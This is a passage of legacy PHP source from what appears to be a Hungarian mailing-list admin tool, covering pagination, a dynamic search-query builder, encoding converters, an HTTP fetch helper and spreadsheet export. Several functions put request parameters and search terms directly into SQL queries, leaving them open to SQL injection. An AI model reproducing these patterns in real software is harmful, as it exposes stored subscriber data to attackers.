  return mysql_real_escape_string($realip);
}


function limit($num_s = 0, $strn = '')
{
  $s = $tu = $tu2 = '';
  global $_SERVER, $querysql, $max, $_GET, $limited;

  if (isset($_GET['pg']))
    $p_g = $_GET['pg'];
  else
    $p_g = '';

  if (!$querysql)
    exit;

  if (!$num_s) {
    $sql = $this->mq($querysql);
    $i = mysql_num_rows($sql);
  } else {
    $i = $num_s;
  }

  $num_rows = $i;
  $qs = str_replace("&pg=" . $p_g, "", $_SERVER['QUERY_STRING']);
  $page = (($i - ($i % $max)) / $max) + 1;
  if (!($i % $max))
    $page--;
  $pga = $page;
  $j = 0;
  settype($p_g, "INT");
  if ($page < $p_g)
    $p_g = 1;
  if ($p_g != "")
    $pg = $p_g;
  else $pg = "1";

  $kezd = 0;
  $kiirathato = 8;
  if ($pg >= $kiirathato / 2)
    $kezd = $pg - ($kiirathato / 2);
  if ($kezd > $page - $kiirathato)
    $kezd = $page - $kiirathato;
  if ($kezd < 0)
    $kezd = 0;
  if ($page > $kiirathato)
    $page = $kezd + $kiirathato;
  $j = $kezd;

	$last = ceil($num_rows / $max);

  if ($page > 1) {
    $s = '<div class="dataTables_wrapper"><div class="row"><div class="col-sm-12"><div class="dataTables_paginate paging_simple_numbers"><ul class="pagination">';
				
			// vissza
    if (($pg - 1) <= $kezd) {
      $s .= '<li class="paginate_button page-item previous disabled"><a href="#" class="page-link">Els</a></li>';
      $s .= '<li class="paginate_button page-item previous disabled"><a href="#" class="page-link">Elz</a></li>';
    } else {
      $s .= '<li class="paginate_button page-item previous"><a href="?' . $qs . '&pg=1' . $strn . '" class="page-link">Els</a></li>';
      $s .= '<li class="paginate_button page-item previous"><a href="?' . $qs . '&pg=' . ($pg - 1) . $strn . '" class="page-link">Elz</a></li>';
    }
			
			// lapok
    while ($j != $page) {
      $j++;
      $s .= '<li class="paginate_button page-item ';
      if ($j == $pg)
        $s .= 'active';
      $s .= '"><a href="';
      if ($j == $pg) {
        $s .= "#";
      } else {
        $s .= "?$qs&pg=$j$strn";
      }
      $s .= '" class="page-link">' . $j . '</a></li>';
    }
			
			// kvetkez
    if ( $pg >= $last) {
      $s .= '<li class="paginate_button page-item next disabled"><a href="#" class="page-link">Kvetkez</a></li>';
      $s .= '<li class="paginate_button page-item next disabled"><a href="#" class="page-link">Utols</a></li>';
    } else {
      $s .= '<li class="paginate_button page-item next"><a href="?' . $qs . '&pg=' . ($pg + 1) . $strn . '" class="page-link">Kvetkez</a></li>';
      $s .= '<li class="paginate_button page-item next"><a href="?' . $qs . '&pg=' . $last . $strn . '" class="page-link">Utols</a></li>';
    }

    $s .= '</ul></div></div></div></div>';
  }
  $l1 = ($pg - 1) * $max;
  $querysql = $querysql . " LIMIT $l1 , $max";
  return $s;
}
	
		// egyni rszletes keress mysql genertor
function reszletes_kereso($Keres_tomb, $kizarox = '')
{
  
  if (!isset($_GET['g'])) $_GET['g'] = $_POST['g'];
  //if (!isset($Keres_tomb['q_tp'])) $Keres_tomb['q_tp'] = '';
  if (isset($Keres_tomb['q_tp']) && is_array($Keres_tomb['q_tp'])) {
    $i = -1;
    $qx = $q = '';
    foreach ($Keres_tomb['q_tp'] as $qtp) {
      $i++;
      if ($Keres_tomb['mu'][$i] == 1) $muv = '=';
      if ($Keres_tomb['mu'][$i] == 2) $muv = '!=';
      if ($Keres_tomb['mu'][$i] == 3) $muv = '>';
      if ($Keres_tomb['mu'][$i] == 4) $muv = '>=';
      if ($Keres_tomb['mu'][$i] == 5) $muv = '<=';
      if ($Keres_tomb['mu'][$i] == 6) $muv = '<';


      if ($Keres_tomb['q_tp'][$i] == 'date') {
        $qx .= "datum $muv '" . $Keres_tomb['q'][$i] . "'";
      } // dtum szrs ---

      elseif ($Keres_tomb['q_tp'][$i] == 'mail') {

        if ($muv == '=') $qx .= "mail like lower('" . str_replace(array('%', '*'), array('\%', '%'), $Keres_tomb['q'][$i]) . "')";
        if ($muv == '!=') $qx .= "mail not like lower('" . str_replace(array('%', '*'), array('\%', '%'), $Keres_tomb['q'][$i]) . "')";

      } // -emailba keresnk ---


      elseif ($Keres_tomb['q_tp'][$i] == 'status') {
        $a = explode(';', $Keres_tomb['qh'][$i]);
        $qxx = '';
        if ($a) foreach ($a as $b)
          if ($b != '') $qxx .= "OR (active $muv $b) ";

        $qx .= "(false $qxx )";

      } // -sttuszba ---

      elseif ($Keres_tomb['q_tp'][$i] == 'mid' || $Keres_tomb['q_tp'][$i] == 'mid2') {
        $a = explode(';', $Keres_tomb['qh'][$i]);
        $qxx = '';
        if ($a) foreach ($a as $b) if ($b) $qxx .= "OR (mid =$b) ";

        if ($qxx) {
          $qxx[0] = ' ';
          $qxx[1] = ' ';
          if ($muv == '=' && $Keres_tomb['q_tp'][$i] == 'mid') $qx .= "(select count(*) from ".DB_PREFIX."stat where uid=us.id and ($qxx) ) ";
          if ($muv == '!=' && $Keres_tomb['q_tp'][$i] == 'mid') $qx .= "!(select count(*) from ".DB_PREFIX."stat where uid=us.id and ($qxx) ) ";
          if ($muv == '=' && $Keres_tomb['q_tp'][$i] == 'mid2') $qx .= "(select count(*) from ".DB_PREFIX."stat where uid=us.id and ($qxx) and stat!='0000-00-00' ) ";
          if ($muv == '!=' && $Keres_tomb['q_tp'][$i] == 'mid2') $qx .= "!(select count(*) from ".DB_PREFIX."stat where uid=us.id and ($qxx) and stat!='0000-00-00' ) ";
        }
      } // -levelekbe keresnk ---

      elseif ($Keres_tomb['q_tp'][$i] == 'alink') {
        $a = explode(';', $Keres_tomb['qh'][$i]);
        $qxx = '';
        if ($a) foreach ($a as $b) if ($b) $qxx .= "OR (aid =$b) ";

        if ($qxx) {
          $qxx[0] = ' ';
          $qxx[1] = ' ';
          if ($muv == '=') $qx .= "(select count(*) from ".DB_PREFIX."act_stat where uid=us.id and ($qxx) and stat!='0000-00-00') ";
          if ($muv == '!=') $qx .= "(select count(*) from ".DB_PREFIX."act_stat where uid=us.id and ($qxx) and stat ='0000-00-00') ";
        }
      } // -akcilinkekbe keresnk ---


      elseif ($Keres_tomb['q_tp'][$i] == 'afile') {
        $a = explode(';', $Keres_tomb['qh'][$i]);
        $qxx = '';
        if ($a) foreach ($a as $b) if ($b) $qxx .= "OR (fid =$b) ";

        if ($qxx) {
          $qxx[0] = ' ';
          $qxx[1] = ' '; //or kitrlse
          if ($muv == '=') $qx .= "(select count(*) from ".DB_PREFIX."down_stat where uid=us.id and ($qxx) ) ";
          if ($muv == '!=') $qx .= "!(select count(*) from ".DB_PREFIX."down_stat where uid=us.id and ($qxx) ) ";
        }
      } // -akcilinkekbe keresnk ---


      elseif ($Keres_tomb['q_tp'][$i] == 'group') {
        $a = explode(';', $Keres_tomb['qh'][$i]);
        $qxx = '';
        if ($a) foreach ($a as $b) if ($b) $qxx .= "OR (g=$b) ";

        if ($qxx) {
          $qxx[0] = ' ';
          $qxx[1] = ' ';
          if ($muv == '=') $qx .= " (SELECT count(id) from `".DB_PREFIX."users` where mail_id=us.mail_id and ($qxx)) ";
          if ($muv == '!=') $qx .= " !(SELECT count(id) from `".DB_PREFIX."users` where (mail_id=us.mail_id and ($qxx))) ";
        }
      } // ---   csoport szrs   ---

      else // egyb mezkbe keresnk
      {
        $sql2 = $this->mq("select * from `".DB_PREFIX."fields` where g='$_GET[g]'"); // meyik mezbe keresnk
        $s2 = $this->m_array("select * from `".DB_PREFIX."fields` where id='" . $Keres_tomb['q_tp'][$i] . "'");
        if ($s2['type'] < 2) //-- text vagy textarea		 					 
        {
          if ($muv == '=') {
            if ($Keres_tomb['q'][$i]) $qx .= " ( select count(*) from ".DB_PREFIX."fields_data where did='$s2[id]' and un=us.id and (lower(".DB_PREFIX."fields_data.text) like lower('" . str_replace(array('%', '*'), array('\%', '%'), $Keres_tomb['q'][$i]) . "')))";
            else // ha olyan mezben keres ami taln ltre sincs hozva 
            $qx .= " ( ( select count(*) from ".DB_PREFIX."fields_data where did='$s2[id]' and un=us.id and (lower(".DB_PREFIX."fields_data.text) like lower('" . str_replace(array('%', '*'), array('\%', '%'), $Keres_tomb['q'][$i]) . "'))) OR !( select count(*) from ".DB_PREFIX."fields_data where (did='$s2[id]' and un=us.id )))";
          } elseif ($muv == '!=') $qx .= " ( select count(*) from ".DB_PREFIX."fields_data where did='$s2[id]' and un=us.id and (lower(".DB_PREFIX."fields_data.text) not like lower('" . str_replace(array('%', '*'), array('\%', '%'), $Keres_tomb['q'][$i]) . "')))";
          else $qx .= " ( select count(*) from ".DB_PREFIX."fields_data where did='$s2[id]' and un=us.id and ((".DB_PREFIX."fields_data.text) $muv ('" . str_replace(array('%', '*'), array('\%', '%'), $Keres_tomb['q'][$i]) . "')))";
          $fd = ", ".DB_PREFIX."fields_data";
        }

        if ($s2['type'] == 6) //-- csak szm
        {
          $qx .= " ( select count(*) from ".DB_PREFIX."fields_data where did='$s2[id]' and un=us.id and (".DB_PREFIX."fields_data.int_text $muv '{$Keres_tomb['q'][$i]}'))";
          $fd = ", ".DB_PREFIX."fields_data";
        }

        if ($s2['type'] == 5) //-- dtum
        {
          $qx .= " ( select count(*) from ".DB_PREFIX."fields_data where did='$s2[id]' and un=us.id and (".DB_PREFIX."fields_data.date $muv '{$Keres_tomb['q'][$i]}'))";
          $fd = ", ".DB_PREFIX."fields_data";
        }

        if ($s2['type'] == 3) //checbox
        {
          if ($Keres_tomb['qh'][$i]) {
            if (!$muv) $muv = '=';
            $a = explode(';', $Keres_tomb['qh'][$i]);
            $qxx = '';
            if ($a) foreach ($a as $b) {
              if ($muv == '=' && $b) $qxx .= "OR ((".DB_PREFIX."fields_data.text LIKE '$b;%') OR (".DB_PREFIX."fields_data.text LIKE '%;$b;%')) ";
									 //if($muv=='=' && $b) $qxx.="OR (".DB_PREFIX."fields_data.text LIKE '%$b;%') ";
              if ($muv == '!=' && $b) $qxx .= "OR ((".DB_PREFIX."fields_data.text NOT LIKE '$b;%') AND (".DB_PREFIX."fields_data.text NOT LIKE '%;$b;%'))";
									 //if($muv=='!=' && $b) $qxx.="OR (".DB_PREFIX."fields_data.text NOT LIKE '%$b;%') "; 
            }
            if ($qxx) {
              $qxx[0] = ' ';
              $qxx[1] = ' ';
              $qx .= " ( select count(*) from ".DB_PREFIX."fields_data where did='$s2[id]' and un=us.id and ($qxx)) ";
              $fd = ", ".DB_PREFIX."fields_data";
            }

          }
        }

        if ($s2['type'] == 4 || $s2['type'] == 2) //rdi - select
        {
          if ($Keres_tomb['qh'][$i]) {
            if (!$muv) $muv = '=';
            $a = explode(';', $Keres_tomb['qh'][$i]);
            $qxx = '';
            if ($a) foreach ($a as $b) {
              if ($muv == '=' && $b) $qxx .= "OR (".DB_PREFIX."fields_data.int_text =$b) ";
              if ($muv == '!=' && $b) $qxx .= "OR (".DB_PREFIX."fields_data.int_text != $b) ";
            }
            if ($qxx) {
              $qxx[0] = ' ';
              $qxx[1] = ' ';
              $qx .= " ( select count(*) from ".DB_PREFIX."fields_data where did='$s2[id]' and un=us.id and ($qxx)) ";
              $fd = ", ".DB_PREFIX."fields_data";
            }

          }
        }
      }
      if ($qx) {
        if ($i)
          if ($Keres_tomb['mx'][$i - 1] == '1')
          $q .= "\r\n" . ' AND ' . "\r\n$qx";
        else $q .= ' OR ' . "\r\n$qx";

        else $q .= "\r\n$qx";
      }
      $qx = '';

    }

    if (isset($Keres_tomb['kizaro'])) {
      $kizaro = '!';
    }
    if ($kizarox == '!') {
      $kizaro = '!';
    }
    if ($kizarox === 0) {
      $kizaro = '';
    }

    if ($q) $q = " AND $kizaro($q)";
    else $q = " AND FALSE ";
			
			 //$querysql="select active, mail, datum, id from `".DB_PREFIX."users` as us where $filter and g='$_GET[g]' AND ($q) order by $order";
  }

  if (!isset($fd)) $fd = '';
  if (!isset($q)) $q = '';
  return array('q' => $q, 'fd' => $fd);
}

	# SQL DUMP
function sql_explode($orig)
{
  $zv = 1;
  $ujstring = '';
  $exploded = array();
  for ($i = 0; $i < strlen($orig); $i++) {
    if ($orig[$i] == "'" && $orig[$i - 1] != '\\' && $zv == 1) {
      $zv = 2;
    } elseif ($orig[$i] == "'" && $orig[$i - 1] != '\\' && $zv == 2) {
      $zv = 1;
    }
    if ($zv == 1 && $orig[$i] == ";") {
      $zv = 1;
      $exploded[] = $ujstring;
      $ujstring = '';
    } else
      $ujstring .= $orig[$i];
  }
  return $exploded;
}

function convert_cp1250_to_utf8($string)
{
  if (function_exists('iconv')) {
    if (@iconv("CP1250", "UTF-8//TRANSLIT", 'rvztr tkrfrgp') != '')
      return iconv("CP1250", "UTF-8//TRANSLIT", $string);
  }
		/*	for($j=0; $j<strlen($string); $j++) { echo $string[$j].' -> '. ord($string[$j]); echo "<br>"; } */

  $string = str_replace(chr(81) . chr(1), "(keycode:x_431_245)", $string);	// 
  $string = str_replace(chr(113) . chr(1), "(keycode:x_431_251)", $string);	// 
  $string = str_replace(chr(13) . chr(1), "(keycode:x_431_232)", $string);	// 
  $string = str_replace(chr(15) . chr(1), "(keycode:x_431_239)", $string);	// 	
  $string = str_replace(chr(58) . chr(1), "(keycode:x_431_229)", $string);	// 
  $string = str_replace(chr(62) . chr(1), "(keycode:x_431_181)", $string);	// 
  $string = str_replace(chr(72) . chr(1), "(keycode:x_431_242)", $string);	// 
  $string = str_replace(chr(244), "(keycode:x_431_244)", $string);			// 
  $string = str_replace(chr(85) . chr(1), "(keycode:x_431_224)", $string);	// 
  $string = str_replace(chr(97) . chr(1), "(keycode:x_431_185)", $string);	// 
  $string = str_replace(chr(101) . chr(1), "(keycode:x_431_187)", $string);	// 
  $string = str_replace(chr(253), "(keycode:x_431_253)", $string);			// 
  $string = str_replace(chr(126) . chr(1), "(keycode:x_431_190)", $string);	// 
  $string = str_replace(chr(27) . chr(1), "(keycode:x_431_236)", $string);	// 
  $string = str_replace(chr(89) . chr(1), "(keycode:x_431_248)", $string);	// 
  $string = str_replace(chr(111) . chr(1), "(keycode:x_431_249)", $string);	// 
  $string = str_replace(chr(80) . chr(1), "(keycode:x_431_213)", $string);	// 
  $string = str_replace(chr(112) . chr(1), "(keycode:x_431_219)", $string);	// 
  $string = str_replace(chr(12) . chr(1), "(keycode:x_431_200)", $string);	// 
  $string = str_replace(chr(14) . chr(1), "(keycode:x_431_207)", $string);	// 
  $string = str_replace(chr(57) . chr(1), "(keycode:x_431_197)", $string);	// 
  $string = str_replace(chr(61) . chr(1), "(keycode:x_431_165)", $string);	// 
  $string = str_replace(chr(71) . chr(1), "(keycode:x_431_210)", $string);	// 
  $string = str_replace(chr(212), "(keycode:x_431_212)", $string);			// 
  $string = str_replace(chr(84) . chr(1), "(keycode:x_431_192)", $string);	// 
  $string = str_replace(chr(96) . chr(1), "(keycode:x_431_169)", $string);	// 
  $string = str_replace(chr(100) . chr(1), "(keycode:x_431_171)", $string);	// 
  $string = str_replace(chr(221), "(keycode:x_431_221)", $string);			// 
  $string = str_replace(chr(125) . chr(1), "(keycode:x_431_174)", $string);	// 
  $string = str_replace(chr(26) . chr(1), "(keycode:x_431_204)", $string);	// 
  $string = str_replace(chr(88) . chr(1), "(keycode:x_431_216)", $string);	// 
  $string = str_replace(chr(110) . chr(1), "(keycode:x_431_217)", $string);	// 
			//$string=str_replace(chr(xxxx).chr(xxxx), "(keycode:x_431_xxxx)", $string);	// 
  $string = str_replace(chr(245), "(keycode:x_431_245)", $string);	// 
  $string = str_replace(chr(251), "(keycode:x_431_251)", $string);	// 
  $string = str_replace(chr(213), "(keycode:x_431_213)", $string);	// 
  $string = str_replace(chr(219), "(keycode:x_431_219)", $string);	// 

  $string = str_replace(chr(0), '', $string);
  $string = str_replace('\0', '', $string);
  $string = utf8_encode($string);


  $string = str_replace("(keycode:x_431_245)", chr(197) . chr(145), $string);			// 
  $string = str_replace("(keycode:x_431_251)", chr(197) . chr(177), $string);			// 
  $string = str_replace("(keycode:x_431_232)", chr(196) . chr(141), $string);			// 
  $string = str_replace("(keycode:x_431_239)", chr(196) . chr(143), $string);			// 	
  $string = str_replace("(keycode:x_431_229)", chr(196) . chr(186), $string);			// 
  $string = str_replace("(keycode:x_431_181)", chr(196) . chr(190), $string);			// 
  $string = str_replace("(keycode:x_431_242)", chr(197) . chr(136), $string);			// 
  $string = str_replace("(keycode:x_431_244)", chr(195) . chr(180), $string);			// 
  $string = str_replace("(keycode:x_431_224)", chr(197) . chr(149), $string);			// 
  $string = str_replace("(keycode:x_431_185)", chr(197) . chr(161), $string);			// 
  $string = str_replace("(keycode:x_431_187)", chr(197) . chr(165), $string);			// 
  $string = str_replace("(keycode:x_431_253)", chr(195) . chr(189), $string);			// 
  $string = str_replace("(keycode:x_431_190)", chr(197) . chr(190), $string);			// 
  $string = str_replace("(keycode:x_431_236)", chr(196) . chr(155), $string);			// 
  $string = str_replace("(keycode:x_431_248)", chr(197) . chr(153), $string);			// 
  $string = str_replace("(keycode:x_431_249)", chr(197) . chr(175), $string);			// 
  $string = str_replace("(keycode:x_431_213)", chr(197) . chr(144), $string);			// 
  $string = str_replace("(keycode:x_431_219)", chr(197) . chr(176), $string);			// 
  $string = str_replace("(keycode:x_431_200)", chr(196) . chr(140), $string);			// 
  $string = str_replace("(keycode:x_431_207)", chr(196) . chr(142), $string);			// 
  $string = str_replace("(keycode:x_431_197)", chr(196) . chr(185), $string);			// 
  $string = str_replace("(keycode:x_431_165)", chr(196) . chr(189), $string);			// 
  $string = str_replace("(keycode:x_431_210)", chr(197) . chr(135), $string);			// 
  $string = str_replace("(keycode:x_431_212)", chr(195) . chr(148), $string);			// 
  $string = str_replace("(keycode:x_431_192)", chr(197) . chr(148), $string);			// 
  $string = str_replace("(keycode:x_431_169)", chr(197) . chr(160), $string);			// 
  $string = str_replace("(keycode:x_431_171)", chr(197) . chr(164), $string);			// 
  $string = str_replace("(keycode:x_431_221)", chr(195) . chr(157), $string);			// 
  $string = str_replace("(keycode:x_431_174)", chr(197) . chr(189), $string);			// 
  $string = str_replace("(keycode:x_431_204)", chr(196) . chr(154), $string);			// 
  $string = str_replace("(keycode:x_431_216)", chr(197) . chr(152), $string);			// 
  $string = str_replace("(keycode:x_431_217)", chr(197) . chr(174), $string);			// 
			//$string=str_replace("(keycode:x_431_xxxx)", chr(xxxx).chr(xxxx), $string);			// 
  return $string;
}

function convert_utf8_to_iso($string)
{ 
			//return $string;
  if (function_exists('iconv')) {
    if (iconv("UTF-8", "CP1250//TRANSLIT", 'rvztr tkrfrgp') != '')
      return iconv("UTF-8", "CP1250//TRANSLIT", $string);
  }

  $string = str_replace(chr(197) . chr(145), "(keycode:x_431_245)", $string);			// 
  $string = str_replace(chr(197) . chr(177), "(keycode:x_431_251)", $string);			// 
  $string = str_replace(chr(196) . chr(141), "(keycode:x_431_232)", $string);			// 
  $string = str_replace(chr(196) . chr(143), "(keycode:x_431_239)", $string);			// 	
  $string = str_replace(chr(196) . chr(186), "(keycode:x_431_229)", $string);			// 
  $string = str_replace(chr(196) . chr(190), "(keycode:x_431_181)", $string);			// 
  $string = str_replace(chr(197) . chr(136), "(keycode:x_431_242)", $string);			// 
  $string = str_replace(chr(195) . chr(180), "(keycode:x_431_244)", $string);			// 
  $string = str_replace(chr(197) . chr(149), "(keycode:x_431_224)", $string);			// 
  $string = str_replace(chr(197) . chr(161), "(keycode:x_431_185)", $string);			// 
  $string = str_replace(chr(197) . chr(165), "(keycode:x_431_187)", $string);			// 
  $string = str_replace(chr(195) . chr(189), "(keycode:x_431_253)", $string);			// 
  $string = str_replace(chr(197) . chr(190), "(keycode:x_431_190)", $string);			// 
  $string = str_replace(chr(196) . chr(155), "(keycode:x_431_236)", $string);			// 
  $string = str_replace(chr(197) . chr(153), "(keycode:x_431_248)", $string);			// 
  $string = str_replace(chr(197) . chr(175), "(keycode:x_431_249)", $string);			// 
  $string = str_replace(chr(197) . chr(144), "(keycode:x_431_213)", $string);			// 
  $string = str_replace(chr(197) . chr(176), "(keycode:x_431_219)", $string);			// 
  $string = str_replace(chr(196) . chr(140), "(keycode:x_431_200)", $string);			// 
  $string = str_replace(chr(196) . chr(142), "(keycode:x_431_207)", $string);			// 
  $string = str_replace(chr(196) . chr(185), "(keycode:x_431_197)", $string);			// 
  $string = str_replace(chr(196) . chr(189), "(keycode:x_431_165)", $string);			// 
  $string = str_replace(chr(197) . chr(135), "(keycode:x_431_210)", $string);			// 
  $string = str_replace(chr(195) . chr(148), "(keycode:x_431_212)", $string);			// 
  $string = str_replace(chr(197) . chr(148), "(keycode:x_431_192)", $string);			// 
  $string = str_replace(chr(197) . chr(160), "(keycode:x_431_169)", $string);			// 
  $string = str_replace(chr(197) . chr(164), "(keycode:x_431_171)", $string);			// 
  $string = str_replace(chr(195) . chr(157), "(keycode:x_431_221)", $string);			// 
  $string = str_replace(chr(197) . chr(189), "(keycode:x_431_174)", $string);			// 
  $string = str_replace(chr(196) . chr(154), "(keycode:x_431_204)", $string);			// 
  $string = str_replace(chr(197) . chr(152), "(keycode:x_431_216)", $string);			// 
  $string = str_replace(chr(197) . chr(174), "(keycode:x_431_217)", $string);			// 


  $string = utf8_decode($string);

  $string = str_replace("(keycode:x_431_245)", chr(245), $string);			// 
  $string = str_replace("(keycode:x_431_251)", chr(251), $string);			// 
  $string = str_replace("(keycode:x_431_232)", chr(232), $string);			// 
  $string = str_replace("(keycode:x_431_239)", chr(239), $string);			// 	
  $string = str_replace("(keycode:x_431_229)", chr(229), $string);			// 
  $string = str_replace("(keycode:x_431_181)", chr(190), $string);			// 
  $string = str_replace("(keycode:x_431_242)", chr(242), $string);			// 
  $string = str_replace("(keycode:x_431_244)", chr(244), $string);			// 
  $string = str_replace("(keycode:x_431_224)", chr(224), $string);			// 
  $string = str_replace("(keycode:x_431_185)", chr(154), $string);			// 
  $string = str_replace("(keycode:x_431_187)", chr(157), $string);			// 
  $string = str_replace("(keycode:x_431_253)", chr(253), $string);			// 
  $string = str_replace("(keycode:x_431_190)", chr(158), $string);			// 
  $string = str_replace("(keycode:x_431_236)", chr(236), $string);			// 
  $string = str_replace("(keycode:x_431_248)", chr(248), $string);			// 
  $string = str_replace("(keycode:x_431_249)", chr(249), $string);			// 
  $string = str_replace("(keycode:x_431_213)", chr(213), $string);			// 
  $string = str_replace("(keycode:x_431_219)", chr(219), $string);			// 
  $string = str_replace("(keycode:x_431_200)", chr(200), $string);			// 
  $string = str_replace("(keycode:x_431_207)", chr(207), $string);			// 
  $string = str_replace("(keycode:x_431_197)", chr(197), $string);			// 
  $string = str_replace("(keycode:x_431_165)", chr(188), $string);			// 
  $string = str_replace("(keycode:x_431_210)", chr(210), $string);			// 
  $string = str_replace("(keycode:x_431_212)", chr(212), $string);			// 
  $string = str_replace("(keycode:x_431_192)", chr(192), $string);			// 
  $string = str_replace("(keycode:x_431_169)", chr(138), $string);			// 
  $string = str_replace("(keycode:x_431_171)", chr(141), $string);			// 
  $string = str_replace("(keycode:x_431_221)", chr(221), $string);			// 
  $string = str_replace("(keycode:x_431_174)", chr(142), $string);			// 
  $string = str_replace("(keycode:x_431_204)", chr(204), $string);			// 
  $string = str_replace("(keycode:x_431_216)", chr(216), $string);			// 
  $string = str_replace("(keycode:x_431_217)", chr(217), $string);			// 

  return $string;
}function download($uri, $port = 80, $extra_headers = null)
{
  if (!function_exists("stripos")) {
    function stripos($str, $needle, $offset = 0)
    {
      return strpos(strtolower($str), strtolower($needle), $offset);
    }/* endfunction stripos */
  }/* endfunction exists stripos*/
  if (!is_int($port)) $port = 80;
  if (!is_array($extra_headers)) $extra_headers = array();
  $uri = strtr(strval($uri), array("http://" => "", "https://" => "ssl://", "ssl://" => "ssl://", "\\" => "/", "//" => "/"));

  if (($protocol = stripos($uri, "://")) !== false) {
    if (($domain_pos = stripos($uri, "/", ($protocol + 3))) !== false) {
      $domain = substr($uri, 0, $domain_pos);
      $file = substr($uri, $domain_pos);
    } else {
      $domain = $uri;
      $file = "/";
    }
  } else {
    if (($domain_pos = stripos($uri, "/")) !== false) {
      $domain = substr($uri, 0, $domain_pos);
      $file = substr($uri, $domain_pos);
    } else {
      $domain = $uri;
      $file = "/";
    }
  }
		  // echo $domain;

  $fp = fsockopen($domain, $port, $errno, $errstr, 30);
  if (!$fp) {
    return false;
  } else {
    $out = "GET " . $file . " HTTP/1.1\r\n";
    $out .= "Host: " . $domain . "\r\n";
    foreach ($extra_headers as $nm => $vl) {
      $out .= strtr(strval($nm), array("\r" => "", "\n" => "", ": " => "", ":" => "")) .
        ": " . strtr(strval($vl), array("\r" => "", "\n" => "", ": " => "", ":" => "")) . "\r\n";
    }
    $out .= "Connection: Close\r\n\r\n";

    $response = "";
    fwrite($fp, $out);
    while (!feof($fp)) {
      $response .= fgets($fp, 128);
    }
    fclose($fp);

    global $http_response_header;
    $http_response_header = array();
    if (stripos($response, "\r\n\r\n") !== false) {

      $response = str_replace(array("0\r\n\r\n", "00593\r\n"), '', $response);

      $hc = explode("\r\n\r\n", $response);
      $headers = explode("\r\n", $hc[0]);

      if (!is_array($headers)) $headers = array();
      foreach ($headers as $key => $header) {
        $a = "";
        $b = "";
        if (stripos($header, ":") !== false) {
          list($a, $b) = explode(":", $header);
          $http_response_header[trim($a)] = trim($b);
        }
      }
				 // print_r($hc);

      $ret = end($hc);
				//	echo "\r\nret:$ret\r\n";
      return $ret;

    } elseif (stripos($response, "\r\n") !== false) {
      $headers = explode("\r\n", $response);

      if (!is_array($headers)) $headers = array();
      foreach ($headers as $key => $header) {
        if ($key < (count($headers) - 1)) {
          $a = "";
          $b = "";
          if (stripos($header, ":") !== false) {
            list($a, $b) = explode(":", $header);
            $http_response_header[trim($a)] = trim($b);
          }
        }
      }
      return end($headers);
    } else {
      return $response;
    }
  }
}/*endfunction download*/

function tp($tp)
{
  if ($tp == 6) $tp = 'int';
  elseif ($tp == 5) $tp = 'date';
  elseif ($tp == 4) $tp = 'radio';
  elseif ($tp == 3) $tp = 'checkbox';
  elseif ($tp == 2) $tp = 'int_text';
  elseif ($tp == 1) $tp = 'textarea';
  else $tp = '';
  return $tp;
}

function inv_tp($tp, $preg = 0)
{  // print_R( $main->inv_tp('valami mez {{select}}',1)); //Array ( [tp] => 2 [str] => valami mez )
	// 
  if ($preg && preg_match('/(.*)\{\{(.*)\}\}/', $tp, $a)) {
    $tp = $a[2];
  } elseif ($preg) // ha nem tallt emzrtket, akkor 0
  {
    return array('tp' => 0, 'str' => $tp);
  }

  $tp = strtolower($tp);

  if ($tp == 'int') $tp = 6;
  elseif ($tp == 'date') $tp = 5;
  elseif ($tp == 'radio') $tp = 4;
  elseif ($tp == 'checkbox') $tp = 3;
  elseif ($tp == 'select') $tp = 2;
  elseif ($tp == 'textarea') $tp = 1;
  else $tp = 0;

  if (!$preg) return $tp;
  else return array('tp' => $tp, 'str' => $a[1]);
}function xls_generate($g, $mid = 0, $type = '', $read = '', $fn = '', $aid = '')
{
  global $lang_wg2;
  if ($g) {
			
	//		echo "---------------- $g, $mid, $type, $read, $fn, $aid----------------------\r\n";
    @error_reporting(0);
    @set_time_limit(0);
		//error_reporting(E_ALL);

    if (isset($_POST['limit'])) {
      $a = explode('|', $_POST['limit']);
      $_POST['limit'] = $a[0];
      $xs = '_' . $a[1];
    } else {
      $_POST['limit'] = '';
      $xs = '';
    }
    if ($mid) {
      $sqlq = "Select * from `".DB_PREFIX."stat` where mid='$mid' " . ($type != '' ? " and type='$type'" : '') . ($read ? ($read == 2 ? " and `stat`='0000-00-00'" : " and `stat`!='0000-00-00'") : '') . ($_POST['limit'] ? " limit $_POST[limit]" : '');
      $sql = $this->mq($sqlq);
    } elseif ($aid) {
      $sqlq = "Select * from `".DB_PREFIX."act_stat` where aid='$aid' and stat!='0000-00-00'" . ($_POST['limit'] ? " limit $_POST[limit]" : '');
      $sql = $this->mq($sqlq);
    } elseif ($_POST['filter']) {
      $_GET['g'] = $g;
      $filter = $this->m_array("select * from `".DB_PREFIX."filters` where id='$_POST[filter]'");
      $t_x = $this->reszletes_kereso(unserialize($filter['data']));
      $q = $t_x['q'];
      $fd = $t_x['fd'];;
      $sql = $this->mq("select * from `".DB_PREFIX."users` as us where a=1 and g='$_POST[g]'$q order by id" . ($_POST['limit'] ? " limit $_POST[limit]" : ''));
    } else $sql = $this->mq("select * from `".DB_PREFIX."users` where `g`='$g' and a=1 order by id" . ($_POST['limit'] ? " limit $_POST[limit]" : ''));

    $gr = $this->m_array("select * from `".DB_PREFIX."groups` where id='$g'");
    $g_dashed = $this->dash($gr['name']);
    if ($fn) $g_dashed = $fn . '_stat';

    $group = $gr['name'];
    $format_bold = 0;

    $counter++;
    $impt /* import type */ = @$_POST['impt'];
		
		//$impt = 'csv';

    if (!$impt) // xls
    {
      $XLS_TP_php = 'PHPExcel/Classes/PHPExcel/Writer/Excel5.php';
      $XLS_save_eval = 'header("Content-Type: application/vnd.ms-excel");
			 header("Content-Disposition: attachment;filename=\"{$g_dashed}{$xs}.xls\"");
			 header("Cache-Control: max-age=0");
			 $objWriter = new PHPExcel_Writer_Excel5($objPHPExcel);';
    }

    if ($impt == 'xlsx') // xlsx
    {
      $XLS_TP_php = 'PHPExcel/Classes/PHPExcel/Writer/Excel2007.php';
      $XLS_save_eval = 'header("Content-Type: application/vnd.ms-excel");
			 header("Content-Disposition: attachment;filename=\"{$g_dashed}{$xs}.xlsx\"");
			 header("Cache-Control: max-age=0");
			 $objWriter = new PHPExcel_Writer_Excel2007($objPHPExcel);';
    }

    if ($impt == 'csv') // xlsx
    {
		  // $XLS_TP_php = 'PHPExcel/Classes/PHPExcel/Writer/Excel2007.php';
      $XLS_save_eval = 'header("Content-type: text/csv");
			 header("Content-Disposition: attachment;filename=\"{$g_dashed}{$xs}.csv\"");
			 header("Cache-Control: max-age=0");
			 $objWriter = new PHPExcel_Writer_CSV($objPHPExcel);
